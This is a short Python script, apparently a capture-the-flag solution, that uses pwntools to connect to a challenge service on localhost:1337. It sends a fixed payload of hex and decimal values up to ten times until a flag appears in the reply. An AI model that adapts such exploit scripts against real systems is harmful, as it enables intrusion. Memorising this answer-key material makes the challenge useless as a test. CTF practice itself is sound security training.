exploit.py

from pwn import *
import argparse

parser = argparse.ArgumentParser()

parser.add_argument('--host', help='Host to connect to', default='localhost')
parser.add_argument('--port', help='Port to connect to', default=1337, type=int)

args = parser.parse_args()

# NOTE: we need to do this a few times to get the flag because it is
# randomized
for _ in range(10):
    r = remote(args.host, args.port)

    exploit = """0x21,100,0x42,100,0x4C,100,0x6,100,0x59,100\n"""

    r.sendline(exploit.encode())

    got = r.recvall().decode()

    if '{' in got:
        print(got)
        break
    else:
        print('Failed to get flag; trying again')

    r.close()
else:
    print('Failed to get flag')